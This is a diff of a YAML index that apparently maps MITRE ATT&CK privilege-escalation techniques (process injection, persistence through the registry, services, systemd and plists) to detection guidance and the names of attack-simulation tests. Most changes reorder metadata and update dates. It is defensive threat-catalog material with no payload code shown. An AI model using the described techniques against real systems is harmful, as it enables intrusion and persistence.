- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Application control
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - API monitoring
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ - User
x_mitre_detection: |-
Monitor and analyze calls to CreateTransaction, CreateFileTransacted, RollbackTransaction, and other rarely used functions indicative of TxF activity. Process Doppelgänging also invokes an outdated and undocumented implementation of the Windows process loader via calls to NtCreateProcessEx and NtCreateThreadEx as well as API calls used to modify memory within another process, such as WriteProcessMemory. (Citation: BlackHat Process Doppelgänging Dec 2017) (Citation: hasherezade Process Doppelgänging Dec 2017)
Scan file objects reported during the PsSetCreateProcessNotifyRoutine, (Citation: Microsoft PsSetCreateProcessNotifyRoutine routine) which triggers a callback whenever a process is created or deleted, specifically looking for file objects with enabled write access. (Citation: BlackHat Process Doppelgänging Dec 2017) Also consider comparing file objects loaded in memory to the corresponding file on disk. (Citation: hasherezade Process Doppelgänging Dec 2017)
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - User
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - API monitoring
- x_mitre_defense_bypassed:
- - Anti-virus
- - Process whitelisting
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1055.012:
technique:
@@ -5121,12 +5222,16 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-26T21:00:39.428Z'
+ modified: '2020-06-20T22:28:08.758Z'
created: '2020-01-14T17:21:54.470Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Application control
+ - Anti-virus
+ x_mitre_data_sources:
+ - Process monitoring
+ - API monitoring
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -5139,14 +5244,10 @@ privilege-escalation:
process behavior to determine if a process is performing actions it usually
does not, such as opening network connections, reading files, or other suspicious
actions that could relate to post-compromise behavior. "
- x_mitre_permissions_required:
- - User
- x_mitre_data_sources:
- - Process monitoring
- - API monitoring
- x_mitre_defense_bypassed:
- - Process whitelisting
- - Anti-virus
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
identifier: T1055.012
atomic_tests:
- name: Process Hollowing using PowerShell
@@ -5221,7 +5322,7 @@ privilege-escalation:
description: GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved
December 20, 2017.
source_name: GNU Acct
- - url: https://access.redhat.com/documentation/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing
+ - url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing
description: Jahoda, M. et al.. (2017, March 14). redhat Security Guide -
Chapter 7 - System Auditing. Retrieved December 20, 2017.
source_name: RHEL auditd
@@ -5241,23 +5342,12 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-26T21:05:43.152Z'
+ modified: '2020-06-20T22:28:45.651Z'
created: '2017-05-31T21:30:47.843Z'
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Anastasios Pingios
- - Christiaan Beek, @ChristiaanBeek
- - Ryan Becwar
- x_mitre_data_sources:
- - API monitoring
- - File monitoring
- - DLL monitoring
- - Process monitoring
- - Named Pipes
- x_mitre_defense_bypassed:
- - Process whitelisting
- - Anti-virus
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -5280,10 +5370,21 @@ privilege-escalation:
to determine if a process is performing actions it usually does not, such
as opening network connections, reading files, or other suspicious actions
that could relate to post-compromise behavior. "
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_defense_bypassed:
+ - Application control
+ - Anti-virus
+ x_mitre_data_sources:
+ - API monitoring
+ - File monitoring
+ - DLL monitoring
+ - Process monitoring
+ - Named Pipes
+ x_mitre_contributors:
+ - Anastasios Pingios
+ - Christiaan Beek, @ChristiaanBeek
+ - Ryan Becwar
+ x_mitre_version: '1.1'
+ x_mitre_is_subtechnique: false
identifier: T1055
atomic_tests:
- name: Process Injection via mavinject.exe
@@ -5343,7 +5444,7 @@ privilege-escalation:
description: GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved
December 20, 2017.
source_name: GNU Acct
- - url: https://access.redhat.com/documentation/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing
+ - url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing
description: Jahoda, M. et al.. (2017, March 14). redhat Security Guide -
Chapter 7 - System Auditing. Retrieved December 20, 2017.
source_name: RHEL auditd
@@ -5383,13 +5484,14 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-26T20:27:52.470Z'
+ modified: '2020-06-20T22:24:56.734Z'
created: '2020-01-14T01:33:19.065Z'
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Application control
+ x_mitre_data_sources:
+ - System calls
+ - Process monitoring
x_mitre_detection: "Monitoring for Linux specific calls such as the ptrace system
call should not generate large amounts of data due to their specialized nature,
and can be a very effective method to detect some of the common process injection
@@ -5398,12 +5500,10 @@ privilege-escalation:
behavior to determine if a process is performing actions it usually does not,
such as opening network connections, reading files, or other suspicious actions
that could relate to post-compromise behavior. "
- x_mitre_data_sources:
- - System calls
- - Process monitoring
- x_mitre_defense_bypassed:
- - Anti-virus
- - Process whitelisting
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
atomic_tests: []
T1037.004:
technique:
@@ -5436,18 +5536,18 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-24T23:46:20.433Z'
created: '2020-01-15T16:25:22.260Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - root
- x_mitre_detection: 'The /etc/rc.common file can be monitored to
- detect changes from the company policy. Monitor process execution resulting
- from the rc.common script for unusual or unknown applications or behavior. '
+ x_mitre_platforms:
+ - macOS
x_mitre_data_sources:
- Process monitoring
- File monitoring
- x_mitre_platforms:
- - macOS
+ x_mitre_detection: 'The /etc/rc.common file can be monitored to
+ detect changes from the company policy. Monitor process execution resulting
+ from the rc.common script for unusual or unknown applications or behavior. '
+ x_mitre_permissions_required:
+ - root
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1037.004
atomic_tests:
- name: rc.common
@@ -5467,18 +5567,15 @@ privilege-escalation:
name: bash
T1547.007:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1547.007
- url: https://attack.mitre.org/techniques/T1547/007
- - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
- description: Patrick Wardle. (2014, September). Methods of Malware Persistence
- on Mac OS X. Retrieved July 5, 2017.
- source_name: Methods of Mac Malware Persistence
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Re-opened Applications
+ created: '2020-01-24T18:15:06.641Z'
+ modified: '2020-01-24T19:51:37.795Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ type: attack-pattern
+ id: attack-pattern--e5cc9e7a-e61a-46a1-b869-55fb6eab058e
description: "Adversaries may modify plist files to automatically run an application
when a user logs in. Starting in Mac OS X 10.7 (Lion), users can specify certain
applications to be re-opened when a user logs into their machine after reboot.
@@ -5489,15 +5586,18 @@ privilege-escalation:
\n\nAn adversary can modify one of these files directly to include a link
to their malicious executable to provide a persistence mechanism each time
the user reboots their machine (Citation: Methods of Mac Malware Persistence)."
- id: attack-pattern--e5cc9e7a-e61a-46a1-b869-55fb6eab058e
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- modified: '2020-01-24T19:51:37.795Z'
- created: '2020-01-24T18:15:06.641Z'
+ name: Re-opened Applications
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1547.007
+ url: https://attack.mitre.org/techniques/T1547/007
+ - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
+ description: Patrick Wardle. (2014, September). Methods of Malware Persistence
+ on Mac OS X. Retrieved July 5, 2017.
+ source_name: Methods of Mac Malware Persistence
x_mitre_platforms:
- macOS
x_mitre_data_sources:
@@ -5625,22 +5725,22 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-25T16:16:26.182Z'
created: '2020-01-23T22:02:48.566Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Oddvar Moe, @oddvarmoe
- x_mitre_data_sources:
- - Windows Registry
- - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_detection: |-
Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. (Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.
Changes to these locations typically happen under normal conditions when legitimate software is installed. To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Windows Registry
+ - File monitoring
+ x_mitre_contributors:
+ - Oddvar Moe, @oddvarmoe
+ x_mitre_platforms:
+ - Windows
identifier: T1547.001
atomic_tests:
- name: Reg Key Run
@@ -5819,24 +5919,24 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-26T21:49:31.964Z'
created: '2020-02-18T18:34:49.414Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Windows event logs
- - Authentication logs
- - API monitoring
+ x_mitre_contributors:
+ - Alain Homewood, Insomnia Security
+ - Vincent Le Toux
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
x_mitre_detection: |-
Examine data in user’s SID-History attributes using the PowerShell Get-ADUser cmdlet (Citation: Microsoft Get-ADUser), especially users who have SID-History values from the same domain. (Citation: AdSecurity SID History Sept 2015) Also monitor account management events on Domain Controllers for successful and failed changes to SID-History. (Citation: AdSecurity SID History Sept 2015) (Citation: Microsoft DsAddSidHistory)
Monitor for Windows API calls to the DsAddSidHistory function. (Citation: Microsoft DsAddSidHistory)
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Alain Homewood, Insomnia Security
- - Vincent Le Toux
+ x_mitre_data_sources:
+ - Windows event logs
+ - Authentication logs
+ - API monitoring
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1053.005:
technique:
@@ -5885,13 +5985,11 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-24T13:45:03.730Z'
created: '2019-11-27T14:58:00.429Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - File monitoring
- - Process command-line parameters
- - Process monitoring
- - Windows event logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_remote_support: true
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: |-
Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.
@@ -5907,11 +6005,13 @@ privilege-escalation:
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.
- x_mitre_permissions_required:
- - Administrator
- x_mitre_remote_support: true
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - File monitoring
+ - Process command-line parameters
+ - Process monitoring
+ - Windows event logs
+ x_mitre_platforms:
+ - Windows
identifier: T1053.005
atomic_tests:
- name: Scheduled Task Startup Script
@@ -6050,19 +6150,18 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-24T13:45:04.006Z'
created: '2017-05-31T21:30:46.977Z'
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- x_mitre_remote_support: true
- x_mitre_effective_permissions:
- - SYSTEM
- - Administrator
- - User
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - User
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '2.0'
+ x_mitre_contributors:
+ - Prashant Verma, Paladion
+ - Leo Loobeek, @leoloobeek
+ - Travis Smith, Tripwire
+ - Alain Homewood, Insomnia Security
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ - Windows event logs
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -6073,18 +6172,19 @@ privilege-escalation:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement."
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Process command-line parameters
- - Windows event logs
- x_mitre_contributors:
- - Prashant Verma, Paladion
- - Leo Loobeek, @leoloobeek
- - Travis Smith, Tripwire
- - Alain Homewood, Insomnia Security
- x_mitre_version: '2.0'
- x_mitre_is_subtechnique: false
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ - User
+ x_mitre_effective_permissions:
+ - SYSTEM
+ - Administrator
+ - User
+ x_mitre_remote_support: true
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
atomic_tests: []
T1546.002:
technique:
@@ -6124,23 +6224,23 @@ privilege-escalation:
phase_name: persistence
modified: '2020-03-23T12:23:04.955Z'
created: '2020-01-24T13:51:01.210Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Bartosz Jerzman
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior.
+
+ Tools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated.
x_mitre_data_sources:
- File monitoring
- Windows Registry
- Process command-line parameters
- Process monitoring
- x_mitre_detection: |-
- Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior.
-
- Tools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated.
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Bartosz Jerzman
+ x_mitre_platforms:
+ - Windows
identifier: T1546.002
atomic_tests:
- name: Set Arbitrary Binary as Screensaver
@@ -6198,22 +6298,22 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-25T15:42:48.910Z'
created: '2020-01-24T17:16:11.806Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - DLL monitoring
- - Windows Registry
- - Loaded DLLs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: 'Monitor the Registry for changes to the SSP Registry keys.
Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012
R2 may generate events when unsigned SSP DLLs try to load into the LSA by
setting the Registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\LSASS.exe with AuditLevel = 8. (Citation: Graeber
2014) (Citation: Microsoft Configure LSA)'
- x_mitre_permissions_required:
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - DLL monitoring
+ - Windows Registry
+ - Loaded DLLs
+ x_mitre_platforms:
+ - Windows
identifier: T1547.005
atomic_tests:
- name: Modify SSP configuration in registry
@@ -6268,8 +6368,22 @@ privilege-escalation:
phase_name: defense-evasion
modified: '2020-03-26T19:37:28.912Z'
created: '2020-03-12T20:43:53.998Z'
- x_mitre_platforms:
- - Windows
+ x_mitre_contributors:
+ - Travis Smith, Tripwire
+ - Stefan Kanthak
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Services
+ - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_effective_permissions:
+ - SYSTEM
+ - Administrator
+ - User
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_detection: "Look for changes to binaries and service executables that
may normally occur during software updates. If an executable is written, renamed,
and/or moved to match an existing service executable, it could be detected
@@ -6278,22 +6392,8 @@ privilege-escalation:
for abnormal process call trees from typical processes and services and for
execution of other commands that could relate to Discovery or other adversary
techniques. "
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_effective_permissions:
- - SYSTEM
- - Administrator
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - Process command-line parameters
- - Services
- - File monitoring
- x_mitre_contributors:
- - Travis Smith, Tripwire
- - Stefan Kanthak
+ x_mitre_platforms:
+ - Windows
identifier: T1574.010
atomic_tests:
- name: File System Permissions Weakness
@@ -6398,32 +6498,32 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-26T19:43:33.981Z'
+ modified: '2020-06-20T22:01:09.906Z'
created: '2020-03-13T11:42:14.444Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Travis Smith, Tripwire
- - Matthew Demaske, Adaptforward
- x_mitre_data_sources:
- - Windows Registry
- - Services
- - Process command-line parameters
+ x_mitre_defense_bypassed:
+ - Application control
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_effective_permissions:
+ - SYSTEM
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_detection: |-
Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.
Monitor processes and command-line arguments for actions that could be done to modify services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be changed through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_effective_permissions:
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_defense_bypassed:
- - Process whitelisting
+ x_mitre_data_sources:
+ - Windows Registry
+ - Services
+ - Process command-line parameters
+ x_mitre_contributors:
+ - Travis Smith, Tripwire
+ - Matthew Demaske, Adaptforward
+ x_mitre_platforms:
+ - Windows
identifier: T1574.011
atomic_tests:
- name: Service Registry Permissions Weakness
@@ -6476,20 +6576,20 @@ privilege-escalation:
phase_name: defense-evasion
modified: '2020-03-27T00:43:58.149Z'
created: '2020-01-30T14:11:41.212Z'
- x_mitre_platforms:
- - Linux
- - macOS
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: Monitor the file system for files that have the setuid or
+ setgid bits set. Monitor for execution of utilities, like chmod, and their
+ command-line arguments to look for setuid or setguid bits being set.
x_mitre_data_sources:
- File monitoring
- Process monitoring
- Process command-line parameters
- x_mitre_detection: Monitor the file system for files that have the setuid or
- setgid bits set. Monitor for execution of utilities, like chmod, and their
- command-line arguments to look for setuid or setguid bits being set.
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Linux
+ - macOS
identifier: T1548.001
atomic_tests:
- name: Make and modify binary from C source
@@ -6591,25 +6691,25 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-25T17:21:27.487Z'
created: '2020-01-24T19:00:32.917Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Travis Smith, Tripwire
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Process command-line parameters
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_detection: Since a shortcut's target path likely will not change, modifications
to shortcut files that do not correlate with known software changes, patches,
removal, etc., may be suspicious. Analysis should attempt to relate shortcut
file change or creation events to other potentially suspicious events based
on known adversary behavior such as process launches of unknown executables
that make network connections.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_contributors:
+ - Travis Smith, Tripwire
+ x_mitre_platforms:
+ - Windows
identifier: T1547.009
atomic_tests:
- name: Shortcut Modification
@@ -6705,19 +6805,19 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-24T23:47:39.124Z'
created: '2020-01-15T18:00:33.603Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - Administrator
+ x_mitre_platforms:
+ - macOS
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
x_mitre_detection: |-
The /Library/StartupItems folder can be monitored for changes. Similarly, the programs that are actually executed from this mechanism should be checked against a whitelist.
Monitor processes that are executed during the bootup process to check for unusual or unknown applications and behavior.
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- x_mitre_platforms:
- - macOS
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1037.005
atomic_tests:
- name: Add file to Local Library StartupItems
@@ -6777,23 +6877,23 @@ privilege-escalation:
phase_name: defense-evasion
modified: '2020-03-27T01:03:26.306Z'
created: '2020-01-30T14:34:44.992Z'
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_data_sources:
- - File monitoring
- - Process command-line parameters
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_effective_permissions:
+ - root
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: On Linux, auditd can alert every time a user's actual ID
and effective ID are different (this is what happens when you sudo). This
technique is abusing normal functionality in macOS and Linux systems, but
sudo has the ability to log all input and output based on the LOG_INPUT
and LOG_OUTPUT directives in the /etc/sudoers file.
- x_mitre_permissions_required:
- - User
- x_mitre_effective_permissions:
- - root
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - File monitoring
+ - Process command-line parameters
+ x_mitre_platforms:
+ - Linux
+ - macOS
identifier: T1548.003
atomic_tests:
- name: Sudo usage
@@ -6915,25 +7015,25 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-25T22:13:59.473Z'
created: '2020-01-17T16:15:19.870Z'
- x_mitre_contributors:
- - Tony Lambert, Red Canary
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - File monitoring
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - User
- - root
+ x_mitre_platforms:
+ - Linux
x_mitre_detection: |-
Systemd service unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and /home//.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user.
Suspicious systemd services can also be identified by comparing results against a trusted system baseline. Malicious systemd services may be detected by using the systemctl utility to examine system wide services: systemctl list-units -–type=service –all. Analyze the contents of .service files present on the file system and ensure that they refer to legitimate, expected executables.
Auditing the execution and command-line arguments of the 'systemctl' utility, as well related utilities such as /usr/sbin/service may reveal malicious systemd service execution.
- x_mitre_platforms:
- - Linux
+ x_mitre_permissions_required:
+ - User
+ - root
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ x_mitre_contributors:
+ - Tony Lambert, Red Canary
identifier: T1543.002
atomic_tests:
- name: Create Systemd Service
@@ -7041,12 +7141,16 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-02-21T22:40:58.149Z'
+ modified: '2020-06-20T22:21:29.233Z'
created: '2020-01-14T01:28:32.166Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Application control
+ - Anti-virus
+ x_mitre_data_sources:
+ - Process monitoring
+ - API monitoring
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -7059,14 +7163,10 @@ privilege-escalation:
process behavior to determine if a process is performing actions it usually
does not, such as opening network connections, reading files, or other suspicious
actions that could relate to post-compromise behavior. "
- x_mitre_permissions_required:
- - User
- x_mitre_data_sources:
- - Process monitoring
- - API monitoring
- x_mitre_defense_bypassed:
- - Process whitelisting
- - Anti-virus
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1055.005:
technique:
@@ -7110,12 +7210,14 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-02-21T22:41:25.118Z'
+ modified: '2020-06-20T22:23:30.093Z'
created: '2020-01-14T01:30:41.092Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Application control
+ x_mitre_data_sources:
+ - Process monitoring
+ - API monitoring
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -7128,12 +7230,10 @@ privilege-escalation:
process behavior to determine if a process is performing actions it usually
does not, such as opening network connections, reading files, or other suspicious
actions that could relate to post-compromise behavior. "
- x_mitre_data_sources:
- - Process monitoring
- - API monitoring
- x_mitre_defense_bypassed:
- - Anti-virus
- - Process whitelisting
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1547.003:
technique:
@@ -7179,10 +7279,15 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-25T15:24:26.476Z'
created: '2020-01-24T15:51:52.317Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Scott Lundgren, @5twenty9, Carbon Black
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - SYSTEM
+ - Administrator
+ x_mitre_detection: |-
+ Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as RegCreateKeyEx and RegSetValueEx as well as execution of the W32tm.exe utility. (Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk. (Citation: Github W32Time Oct 2017)
+
+ The Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers. (Citation: TechNet Autoruns)
x_mitre_data_sources:
- API monitoring
- Binary file metadata
@@ -7190,18 +7295,30 @@ privilege-escalation:
- File monitoring
- Loaded DLLs
- Process monitoring
- x_mitre_detection: |-
